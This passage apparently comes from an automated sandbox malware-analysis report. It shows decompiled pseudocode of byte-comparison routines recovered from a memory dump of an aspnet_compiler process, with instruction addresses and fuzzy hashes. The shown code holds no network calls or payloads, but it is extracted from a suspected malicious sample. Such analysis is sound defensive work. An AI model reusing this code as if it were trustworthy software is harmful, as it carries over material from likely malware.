							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
							if(_t318 == 0) {
								L32:
								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
								if(_t320 == 0) {
									L34:
									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
									if(_t241 != 0) {
										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
									}
									goto L37;
								}
								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L34;
							}
							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L32;
						}
						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L30;
					}
					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
					if(_t322 == 0) {
						L19:
						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
						if(_t324 == 0) {
							L21:
							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
							if(_t326 == 0) {
								L23:
								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
								if(_t241 != 0) {
									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
								}
								goto L26;
							}
							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L23;
						}
						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L21;
					}
					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
					if(_t241 != 0) {
						goto L2;
					}
					goto L19;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi == 0) {
						L8:
						__edi =  *(__esi - 0x1d) & 0x000000ff;
						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
						if(__edi == 0) {
							L10:
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							if(__edi == 0) {
								L12:
								__ecx =  *(__esi - 0x1b) & 0x000000ff;
								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L15;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								L2:
								_t192 = _t241;
								return _t192;
							}
							goto L12;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L2;
						}
						goto L10;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L2;
					}
					goto L8;
				}
			}






























                0x00436603
                0x00436603
                0x00436609
                0x00436690
                0x00436692
                0x00436694
                0x00000000
                0x00000000
                0x0043669a
                0x004366a0
                0x00436727
                0x00436729
                0x0043672b
                0x00000000
                0x00000000
                0x00436731
                0x00436737
                0x004367be
                0x004367c0
                0x004367c2
                0x00000000
                0x00000000
                0x004367c8
                0x004367ce
                0x00436855
                0x00436857
                0x00436859
                0x00000000
                0x00000000
                0x0043685f
                0x00436865
                0x004368ec
                0x004368ee
                0x004368f0
                0x00000000
                0x00000000
                0x004368fc
                0x00436984
                0x00436986
                0x00436988
                0x00000000
                0x00000000
                0x0043698e
                0x00436994
                0x00436a1b
                0x00436a1d
                0x00436a1f
                0x00436a1f
                0x00000000
                0x00436a1f
                0x004369a1
                0x004369a3
                0x004369bb
                0x004369c3
                0x004369c5
                0x004369dd
                0x004369e5
                0x004369e7
                0x004369ff
                0x00436a07
                0x00436a09
                0x00436a12
                0x00436a12
                0x00000000
                0x00436a09
                0x004369f0
                0x004369f9
                0x00000000
                0x00000000
                0x00000000
                0x004369f9
                0x004369ce
                0x004369d7
                0x00000000
                0x00000000
                0x00000000
                0x004369d7
                0x004369ac
                0x004369b5
                0x00000000
                0x00000000
                0x00000000
                0x004369b5
                0x0043690a
                0x0043690c
                0x00436924
                0x0043692c
                0x0043692e
                0x00436946
                0x0043694e
                0x00436950
                0x00436968
                0x00436970
                0x00436972
                0x0043697b
                0x0043697b
                0x00000000
                0x00436972
                0x00436959
                0x00436962
                0x00000000
                0x00000000
                0x00000000
                0x00436962
                0x00436937
                0x00436940
                0x00000000
                0x00000000
                0x00000000
                0x00436940
                0x00436915
                0x0043691e
                0x00000000
                0x00000000
                0x00000000
                0x0043691e
                0x00436872
                0x00436874
                0x0043688c
                0x00436894
                0x00436896
                0x004368ae
                0x004368b6
                0x004368b8
                0x004368d0
                0x004368d8
                0x004368da
                0x004368e3
                0x004368e3
                0x00000000
                0x004368da
                0x004368c1
                0x004368ca
                0x00000000
                0x00000000
                0x00000000
                0x004368ca
                0x0043689f
                0x004368a8
                0x00000000
                0x00000000
                0x00000000
                0x004368a8
                0x0043687d
                0x00436886
                0x00000000
                0x00000000
                0x00000000
                0x00436886
                0x004367db
                0x004367dd
                0x004367f5
                0x004367fd
                0x004367ff
                0x00436817
                0x0043681f
                0x00436821
                0x00436839
                0x00436841
                0x00436843
                0x0043684c
                0x0043684c
                0x00000000
                0x00436843
                0x0043682a
                0x00436833
                0x00000000
                0x00000000
                0x00000000
                0x00436833
                0x00436808
                0x00436811
                0x00000000
                0x00000000
                0x00000000
                0x00436811
                0x004367e6
                0x004367ef
                0x00000000
                0x00000000
                0x00000000
                0x004367ef
                0x00436744
                0x00436746
                0x0043675e
                0x00436766
                0x00436768
                0x00436780
                0x00436788
                0x0043678a
                0x004367a2
                0x004367aa
                0x004367ac
                0x004367b5
                0x004367b5
                0x00000000
                0x004367ac
                0x00436793
                0x0043679c
                0x00000000
                0x00000000
                0x00000000
                0x0043679c
                0x00436771
                0x0043677a
                0x00000000
                0x00000000
                0x00000000
                0x0043677a
                0x0043674f
                0x00436758
                0x00000000
                0x00000000
                0x00000000
                0x00436758
                0x004366ad
                0x004366af
                0x004366c7
                0x004366cf
                0x004366d1
                0x004366e9
                0x004366f1
                0x004366f3
                0x0043670b
                0x00436713
                0x00436715
                0x0043671e
                0x0043671e
                0x00000000
                0x00436715
                0x004366fc
                0x00436705
                0x00000000
                0x00000000
                0x00000000
                0x00436705
                0x004366da
                0x004366e3
                0x00000000
                0x00000000
                0x00000000
                0x004366e3
                0x004366b8
                0x004366c1
                0x00000000
                0x00000000
                0x00000000
                0x0043660f
                0x0043660f
                0x00436616
                0x00436618
                0x00436630
                0x00436630
                0x00436638
                0x0043663a
                0x00436652
                0x00436652
                0x0043665a
                0x0043665c
                0x00436674
                0x00436674
                0x0043667c
                0x0043667e
                0x00436687
                0x00436687
                0x00000000
                0x0043667e
                0x00436662
                0x00436665
                0x0043666e
                0x004361c6
                0x004361c6
                0x00436fb7
                0x00436fb7
                0x00000000
                0x0043666e
                0x00436640
                0x00436643
                0x0043664c
                0x00000000
                0x00000000
                0x00000000
                0x0043664c
                0x0043661e
                0x00436621
                0x0043662a
                0x00000000
                0x00000000
                0x00000000
                0x0043662a

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                • Instruction ID: cdb42f118382171dd6da90fa2902f7a3e49d7853cbb1e863012291fa1a79d2cc
                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                • Instruction Fuzzy Hash: 06C1B5322050931ADF2D4639893403FBAA15EA57B171BA75FD4B3CB2C5FE28C538D624
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00436A38 Relevance: .3, Instructions: 341COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 100%
                			E00436A38(void* __edx, void* __esi) {
				signed int _t197;
				signed char _t198;
				signed char _t199;
				signed char _t200;
				signed char _t202;
				signed char _t203;
				signed int _t246;
				void* _t294;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t333;
				void* _t335;
				void* _t336;

				_t336 = __esi;
				_t294 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t246 = 0;
					L14:
					if(_t246 != 0) {
						goto L1;
					}
					_t198 =  *(_t336 - 0x1b);
					if(_t198 ==  *(_t294 - 0x1b)) {
						_t246 = 0;
						L25:
						if(_t246 != 0) {
							goto L1;
						}
						_t199 =  *(_t336 - 0x17);
						if(_t199 ==  *(_t294 - 0x17)) {
							_t246 = 0;
							L36:
							if(_t246 != 0) {
								goto L1;
							}
							_t200 =  *(_t336 - 0x13);
							if(_t200 ==  *(_t294 - 0x13)) {
								_t246 = 0;
								L47:
								if(_t246 != 0) {
									goto L1;
								}
								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
									_t246 = 0;
									L58:
									if(_t246 != 0) {
										goto L1;
									}
									_t202 =  *(_t336 - 0xb);
									if(_t202 ==  *(_t294 - 0xb)) {
										_t246 = 0;
										L69:
										if(_t246 != 0) {
											goto L1;
										}
										_t203 =  *(_t336 - 7);
										if(_t203 ==  *(_t294 - 7)) {
											_t246 = 0;
											L80:
											if(_t246 != 0) {
												goto L1;
											}
											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
											if(_t297 == 0) {
												L83:
												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
												if(_t299 == 0) {
													L3:
													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
										if(_t301 == 0) {
											L73:
											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
											if(_t303 == 0) {
												L75:
												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
												if(_t305 == 0) {
													L77:
													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
									if(_t307 == 0) {
										L62:
										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
										if(_t309 == 0) {
											L64:
											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
											if(_t311 == 0) {
												L66:
												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
												if(_t246 != 0) {
													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
								if(_t313 == 0) {
									L51:
									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
									if(_t315 == 0) {
										L53:
										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
										if(_t317 == 0) {
											L55:
											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
											if(_t246 != 0) {
												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L40:
								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L42:
									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L44:
										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
										if(_t246 != 0) {
											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
						if(_t325 == 0) {
							L29:
							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
							if(_t327 == 0) {
								L31:
								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
								if(_t329 == 0) {
									L33:
									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
									if(_t246 != 0) {
										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
					if(_t331 == 0) {
						L18:
						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
						if(_t333 == 0) {
							L20:
							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
							if(_t335 == 0) {
								L22:
								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
								if(_t246 != 0) {
									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
					if(_t246 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi =  *(__esi - 0x1f) & 0x000000ff;
					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t197 = _t246;
				return _t197;
			}
































                0x00436a38
                0x00436a38
                0x00436a3e
                0x00436ac6
                0x00436ac8
                0x00436aca
                0x00000000
                0x00000000
                0x00436ad0
                0x00436ad6
                0x00436b5d
                0x00436b5f
                0x00436b61
                0x00000000
                0x00000000
                0x00436b67
                0x00436b6d
                0x00436bf4
                0x00436bf6
                0x00436bf8
                0x00000000
                0x00000000
                0x00436bfe
                0x00436c04
                0x00436c8b
                0x00436c8d
                0x00436c8f
                0x00000000
                0x00000000
                0x00436c9b
                0x00436d23
                0x00436d25
                0x00436d27
                0x00000000
                0x00000000
                0x00436d2d
                0x00436d33
                0x00436dba
                0x00436dbc
                0x00436dbe
                0x00000000
                0x00000000
                0x00436dc4
                0x00436dca
                0x00436e51
                0x00436e53
                0x00436e55
                0x00000000
                0x00000000
                0x00436e63
                0x00436e65
                0x00436e7d
                0x00436e85
                0x00436e87
                0x004365e0
                0x004365e8
                0x004365ea
                0x004365f7
                0x004365f7
                0x00000000
                0x004365ea
                0x00436e94
                0x004365da
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004365da
                0x00436e6e
                0x00436e77
                0x00000000
                0x00000000
                0x00000000
                0x00436e77
                0x00436dd7
                0x00436dd9
                0x00436df1
                0x00436df9
                0x00436dfb
                0x00436e13
                0x00436e1b
                0x00436e1d
                0x00436e35
                0x00436e3d
                0x00436e3f
                0x00436e48
                0x00436e48
                0x00000000
                0x00436e3f
                0x00436e26
                0x00436e2f
                0x00000000
                0x00000000
                0x00000000
                0x00436e2f
                0x00436e04
                0x00436e0d
                0x00000000
                0x00000000
                0x00000000
                0x00436e0d
                0x00436de2
                0x00436deb
                0x00000000
                0x00000000
                0x00000000
                0x00436deb
                0x00436d40
                0x00436d42
                0x00436d5a
                0x00436d62
                0x00436d64
                0x00436d7c
                0x00436d84
                0x00436d86
                0x00436d9e
                0x00436da6
                0x00436da8
                0x00436db1
                0x00436db1
                0x00000000
                0x00436da8
                0x00436d8f
                0x00436d98
                0x00000000
                0x00000000
                0x00000000
                0x00436d98
                0x00436d6d
                0x00436d76
                0x00000000
                0x00000000
                0x00000000
                0x00436d76
                0x00436d4b
                0x00436d54
                0x00000000
                0x00000000
                0x00000000
                0x00436d54
                0x00436ca9
                0x00436cab
                0x00436cc3
                0x00436ccb
                0x00436ccd
                0x00436ce5
                0x00436ced
                0x00436cef
                0x00436d07
                0x00436d0f
                0x00436d11
                0x00436d1a
                0x00436d1a
                0x00000000
                0x00436d11
                0x00436cf8
                0x00436d01
                0x00000000
                0x00000000
                0x00000000
                0x00436d01
                0x00436cd6
                0x00436cdf
                0x00000000
                0x00000000
                0x00000000
                0x00436cdf
                0x00436cb4
                0x00436cbd
                0x00000000
                0x00000000
                0x00000000
                0x00436cbd
                0x00436c11
                0x00436c13
                0x00436c2b
                0x00436c33
                0x00436c35
                0x00436c4d
                0x00436c55
                0x00436c57
                0x00436c6f
                0x00436c77
                0x00436c79
                0x00436c82
                0x00436c82
                0x00000000
                0x00436c79
                0x00436c60
                0x00436c69
                0x00000000
                0x00000000
                0x00000000
                0x00436c69
                0x00436c3e
                0x00436c47
                0x00000000
                0x00000000
                0x00000000
                0x00436c47
                0x00436c1c
                0x00436c25
                0x00000000
                0x00000000
                0x00000000
                0x00436c25
                0x00436b7a
                0x00436b7c
                0x00436b94
                0x00436b9c
                0x00436b9e
                0x00436bb6
                0x00436bbe
                0x00436bc0
                0x00436bd8
                0x00436be0
                0x00436be2
                0x00436beb
                0x00436beb
                0x00000000
                0x00436be2
                0x00436bc9
                0x00436bd2
                0x00000000
                0x00000000
                0x00000000
                0x00436bd2
                0x00436ba7
                0x00436bb0
                0x00000000
                0x00000000
                0x00000000
                0x00436bb0
                0x00436b85
                0x00436b8e
                0x00000000
                0x00000000
                0x00000000
                0x00436b8e
                0x00436ae3
                0x00436ae5
                0x00436afd
                0x00436b05
                0x00436b07
                0x00436b1f
                0x00436b27
                0x00436b29
                0x00436b41
                0x00436b49
                0x00436b4b
                0x00436b54
                0x00436b54
                0x00000000
                0x00436b4b
                0x00436b32
                0x00436b3b
                0x00000000
                0x00000000
                0x00000000
                0x00436b3b
                0x00436b10
                0x00436b19
                0x00000000
                0x00000000
                0x00000000
                0x00436b19
                0x00436aee
                0x00436af7
                0x00000000
                0x00000000
                0x00000000
                0x00436a44
                0x00436a48
                0x00436a4c
                0x00436a4e
                0x00436a66
                0x00436a66
                0x00436a6e
                0x00436a70
                0x00436a88
                0x00436a88
                0x00436a90
                0x00436a92
                0x00436aaa
                0x00436aaa
                0x00436ab2
                0x00436ab4
                0x00436abd
                0x00436abd
                0x00000000
                0x00436ab4
                0x00436a98
                0x00436a9b
                0x00436aa4
                0x00000000
                0x00000000
                0x00000000
                0x00436aa4
                0x00436a76
                0x00436a79
                0x00436a82
                0x00000000
                0x00000000
                0x00000000
                0x00436a82
                0x00436a54
                0x00436a57
                0x00436a60
                0x00000000
                0x00000000
                0x00000000
                0x00436a60
                0x004361c6
                0x004361c6
                0x00436fb7

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                • Instruction ID: e4845fd6f3ec705c7f029f6006d4d019cd45b72a32bdd236f80440e8df792853
                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                • Instruction Fuzzy Hash: 26C194322050A31ADF2D4639C93403FFAA15A967B171BA76ED4B2CB2C5FE18D538D624
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004361CE Relevance: .3, Instructions: 331COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 100%
                			E004361CE(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
